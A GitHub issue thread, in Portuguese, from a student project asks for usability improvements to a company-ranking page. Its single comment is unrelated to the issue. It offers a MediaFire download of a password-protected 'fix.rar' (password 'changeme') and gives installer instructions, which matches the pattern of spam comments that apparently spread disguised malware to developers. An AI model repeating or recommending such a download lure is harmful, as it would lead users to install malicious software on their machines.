### ISSUE TITLE
Melhorar a interface da página de ranking das empresas para que fique mais intuitiva

### ISSUE THREAD

**Issue by davi-aguiar-vieira** [unb-mds/2024-1-Squad-10#105]
### Melhorar a Usabilidade da Página de Ranking das Empresas

**Descrição:**  
Revisar o design e a usabilidade da página de ranking das empresas, implementando melhorias para torná-la mais intuitiva e fácil de navegar para os usuários.

**Tarefas:**
- Realizar uma análise de usabilidade específica para a página de ranking das empresas, identificando pontos de confusão ou dificuldade.
- Implementar melhorias no layout e na navegação dessa página para facilitar o uso.
- Testar as mudanças com usuários reais focados na interação com o ranking das empresas para validar a eficácia das melhorias.
- Garantir que todas as funcionalidades e informações dessa página sejam facilmente acessíveis e compreensíveis.

**Prioridade:** Alta

**Comment by Avishake2017** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
